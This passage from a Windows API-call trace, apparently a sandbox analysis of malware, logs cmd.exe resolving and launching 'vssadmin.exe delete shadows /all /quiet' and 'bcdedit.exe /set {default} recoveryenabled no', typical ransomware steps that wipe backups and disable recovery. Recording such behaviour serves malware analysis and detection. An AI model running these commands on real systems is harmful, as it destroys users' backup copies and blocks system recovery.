(_String1="vssadmin.exe", _String2="VERIFY") returned 14 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="VER") returned 14 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="VOL") returned 4 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="EXIT") returned 17 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="SETLOCAL") returned 3 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="ENDLOCAL") returned 17 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="TITLE") returned 2 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="START") returned 3 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="DPATH") returned 18 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="KEYS") returned 11 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="MOVE") returned 9 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="PUSHD") returned 6 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="POPD") returned 6 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="ASSOC") returned 21 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="FTYPE") returned 16 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="BREAK") returned 20 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="COLOR") returned 19 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="MKLINK") returned 9 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="DIR") returned 18 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="ERASE") returned 17 [0178.211] _wcsicmp (_String1="vssadmin.exe", _String2="DEL") returned 18 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="TYPE") returned 2 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="COPY") returned 19 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="CD") returned 19 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="CHDIR") returned 19 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="RENAME") returned 4 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="REN") returned 4 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="ECHO") returned 17 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="SET") returned 3 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="PAUSE") returned 6 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="DATE") returned 18 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="TIME") returned 2 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="PROMPT") returned 6 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="MD") returned 9 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="MKDIR") returned 9 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="RD") returned 4 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="RMDIR") returned 4 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="PATH") returned 6 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="GOTO") returned 15 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="SHIFT") returned 3 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="CLS") returned 19 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="CALL") returned 19 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="VERIFY") returned 14 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="VER") returned 14 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="VOL") returned 4 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="EXIT") returned 17 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="SETLOCAL") returned 3 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="ENDLOCAL") returned 17 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="TITLE") returned 2 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="START") returned 3 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="DPATH") returned 18 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="KEYS") returned 11 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="MOVE") returned 9 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="PUSHD") returned 6 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="POPD") returned 6 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="ASSOC") returned 21 [0178.212] _wcsicmp (_String1="vssadmin.exe", _String2="FTYPE") returned 16 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="BREAK") returned 20 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="COLOR") returned 19 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="MKLINK") returned 9 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="FOR") returned 16 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="IF") returned 13 [0178.213] _wcsicmp (_String1="vssadmin.exe", _String2="REM") returned 4 [0178.213] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0178.214] SetErrorMode (uMode=0x0) returned 0x1 [0178.214] SetErrorMode (uMode=0x1) returned 0x0 [0178.214] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2b1d30, lpFilePart=0x1cf4a4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1cf4a4*="system32") returned 0x13 [0178.214] SetErrorMode (uMode=0x1) returned 0x1 [0178.214] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.214] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.219] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.219] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1cf240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf240) returned 0x2a0ee8 [0178.220] FindClose (in: hFindFile=0x2a0ee8 | out: hFindFile=0x2a0ee8) returned 1 [0178.220] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0178.220] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0178.220] GetConsoleTitleW (in: lpConsoleTitle=0x1cf718, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.220] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf5a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf668 | out: lpAttributeList=0x1cf5a0, lpSize=0x1cf668) returned 1 [0178.220] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf5a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf660, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf5a0, lpPreviousValue=0x0) returned 1 [0178.220] GetStartupInfoW (in: lpStartupInfo=0x1cf55c | out: lpStartupInfo=0x1cf55c*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0178.220] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.221] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1cf5fc*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="vssadmin.exe delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf648 | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet ", lpProcessInformation=0x1cf648*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc24, dwThreadId=0xc90)) returned 1 [0178.438] CloseHandle (hObject=0x4c) returned 1 [0178.438] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.438] GetEnvironmentStringsW () returned 0x2b01a0* [0178.438] FreeEnvironmentStringsW (penv=0x2b01a0) returned 1 [0178.438] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0214.577] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf53c | out: lpExitCode=0x1cf53c*=0x0) returned 1 [0214.577] CloseHandle (hObject=0x50) returned 1 [0214.577] _vsnwprintf (in: _Buffer=0x1cf684, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf548 | out: _Buffer="00000000") returned 8 [0214.577] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.577] GetEnvironmentStringsW () returned 0x2b2250* [0214.577] FreeEnvironmentStringsW (penv=0x2b2250) returned 1 [0214.577] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.577] GetEnvironmentStringsW () returned 0x2b2250* [0214.577] FreeEnvironmentStringsW (penv=0x2b2250) returned 1 [0214.577] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf5a0 | out: lpAttributeList=0x1cf5a0) [0214.577] GetConsoleTitleW (in: lpConsoleTitle=0x1cf920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.578] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe")) returned 0x20 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="DIR") returned -2 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="ERASE") returned -3 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="DEL") returned -2 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="TYPE") returned -18 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="COPY") returned -1 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="CD") returned -1 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="CHDIR") returned -1 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="RENAME") returned -16 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="REN") returned -16 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="ECHO") returned -3 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="SET") returned -17 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="PAUSE") returned -14 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="DATE") returned -2 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="TIME") returned -18 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="PROMPT") returned -14 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="MD") returned -11 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="MKDIR") returned -11 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="RD") returned -16 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="RMDIR") returned -16 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="PATH") returned -14 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="GOTO") returned -5 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="SHIFT") returned -17 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="CLS") returned -1 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="CALL") returned -1 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="VERIFY") returned -20 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="VER") returned -20 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="VOL") returned -20 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="EXIT") returned -3 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="SETLOCAL") returned -17 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="ENDLOCAL") returned -3 [0214.578] _wcsicmp (_String1="bcdedit.exe", _String2="TITLE") returned -18 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="START") returned -17 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="DPATH") returned -2 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="KEYS") returned -9 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="MOVE") returned -11 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="PUSHD") returned -14 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="POPD") returned -14 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="ASSOC") returned 1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="FTYPE") returned -4 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="BREAK") returned -15 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="COLOR") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="MKLINK") returned -11 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="DIR") returned -2 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="ERASE") returned -3 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="DEL") returned -2 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="TYPE") returned -18 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="COPY") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="CD") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="CHDIR") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="RENAME") returned -16 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="REN") returned -16 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="ECHO") returned -3 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="SET") returned -17 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="PAUSE") returned -14 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="DATE") returned -2 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="TIME") returned -18 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="PROMPT") returned -14 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="MD") returned -11 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="MKDIR") returned -11 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="RD") returned -16 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="RMDIR") returned -16 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="PATH") returned -14 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="GOTO") returned -5 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="SHIFT") returned -17 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="CLS") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="CALL") returned -1 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="VERIFY") returned -20 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="VER") returned -20 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="VOL") returned -20 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="EXIT") returned -3 [0214.579] _wcsicmp (_String1="bcdedit.exe", _String2="SETLOCAL") returned -17 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="ENDLOCAL") returned -3 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="TITLE") returned -18 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="START") returned -17 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="DPATH") returned -2 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="KEYS") returned -9 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="MOVE") returned -11 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="PUSHD") returned -14 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="POPD") returned -14 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="ASSOC") returned 1 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="FTYPE") returned -4 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="BREAK") returned -15 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="COLOR") returned -1 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="MKLINK") returned -11 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="FOR") returned -4 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="IF") returned -7 [0214.580] _wcsicmp (_String1="bcdedit.exe", _String2="REM") returned -16 [0214.580] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.580] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.580] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.580] FindClose (in: hFindFile=0x2ae3b0 | out: hFindFile=0x2ae3b0) returned 1 [0214.580] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0214.580] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0214.580] GetConsoleTitleW (in: lpConsoleTitle=0x1cf6b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.581] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf53c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf604 | out: lpAttributeList=0x1cf53c, lpSize=0x1cf604) returned 1 [0214.581] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf53c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf5fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf53c, lpPreviousValue=0x0) returned 1 [0214.581] GetStartupInfoW (in: lpStartupInfo=0x1cf4f8 | out: lpStartupInfo=0x1cf4f8*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0214.581] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.581] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit.exe /set {default} recoveryenabled no ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1cf598*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="bcdedit.exe /set {default} recoveryenabled no ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf5e4 | out: lpCommandLine="bcdedit.exe /set {default} recoveryenabled no ", lpProcessInformation=0x1cf5e4*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb58, dwThreadId=0xec0)) returned 1 [0214.618] CloseHandle (hObject=0x50) returned 1 [0214.618] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.618] GetEnvironmentStringsW () returned 0x2b2250* [0214.619] FreeEnvironmentStringsW (penv=0x2b2250) returned 1 [0214.619] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0214.738] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cf4d8 | out: lpExitCode=0x1cf4d8*=0x0) returned 1 [0214.738] CloseHandle (hObject=0x4c) returned 1 [0214.738] _vsnwprintf (in: _Buffer=0x1cf620, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf4e4 | out: _Buffer="00000000") returned 8 [0214.738] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.738] GetEnvironmentStringsW () returned 0x2b2250* [0214.738] FreeEnvironmentStringsW (penv=0x2b2250) returned 1 [0214.738] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.739] GetEnvironmentStringsW () returned 0x2b2250* [0214.739] FreeEnvironmentStringsW (penv=0x2b2250) returned 1 [0214.739] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf53c | out: lpAttributeList=0x1cf53c) [0214.739] GetConsoleTitleW (in: lpConsoleTitle=0x1cf920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.739] GetFileAttributesW (lpFileName="bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe")) returned 0x20 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="DIR") returned -2 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="ERASE") returned -3 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="DEL") returned -2 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="TYPE") returned -18 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="COPY") returned -1 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="CD") returned -1 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="CHDIR") returned -1 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="RENAME") returned -16 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="REN") returned -16 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="ECHO") returned -3 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="SET") returned -17 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="PAUSE") returned -14 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="DATE") returned -2 [0214.739] _wcsicmp (_String1="bcdedit.exe", _String2="TIME") returned -18 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="PROMPT") returned -14 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="MD") returned -11 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="MKDIR") returned -11 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="RD") returned -16 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="RMDIR") returned -16 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="PATH") returned -14 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="GOTO") returned -5 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="SHIFT") returned -17 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="CLS") returned -1 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="CALL") returned -1 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="VERIFY") returned -20 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="VER") returned -20 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="VOL") returned -20 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="EXIT") returned -3 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="SETLOCAL") returned -17 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="ENDLOCAL") returned -3 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="TITLE") returned -18 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="START") returned -17 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="DPATH") returned -2 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="KEYS") returned -9 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="MOVE") returned -11 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="PUSHD") returned -14 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="POPD") returned -14 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="ASSOC") returned 1 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="FTYPE") returned -4 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="BREAK") returned -15 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="COLOR") returned -1 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="MKLINK") returned -11 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="DIR") returned -2 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="ERASE") returned -3 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="DEL") returned -2 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="TYPE") returned -18 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="COPY") returned -1 [0214.740] _wcsicmp (_String1="bcdedit.exe", _String2="CD") returned -1 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="CHDIR") returned -1 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="RENAME") returned -16 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="REN") returned -16 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="ECHO") returned -3 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="SET") returned -17 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="PAUSE") returned -14 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="DATE") returned -2 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="TIME") returned -18 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="PROMPT") returned -14 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="MD") returned -11 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="MKDIR") returned -11 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="RD") returned -16 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="RMDIR") returned -16 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="PATH") returned -14 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="GOTO") returned -5 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="SHIFT") returned -17 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="CLS") returned -1 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="CALL") returned -1 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="VERIFY") returned -20 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="VER") returned -20 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="VOL") returned -20 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="EXIT") returned -3 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="SETLOCAL") returned -17 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="ENDLOCAL") returned -3 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="TITLE") returned -18 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="START") returned -17 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="DPATH") returned -2 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="KEYS") returned -9 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="MOVE") returned -11 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="PUSHD") returned -14 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="POPD") returned -14 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="ASSOC") returned 1 [0214.741] _wcsicmp (_String1="bcdedit.exe", _String2="FTYPE") returned -4 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="BREAK") returned -15 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="COLOR") returned -1 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="MKLINK") returned -11 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="FOR") returned -4 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="IF") returned -7 [0214.742] _wcsicmp (_String1="bcdedit.exe", _String2="REM") returned -16 [0214.742] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.742] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.742] GetEnvironmentVariableW (in: lpName="PATHEXT", 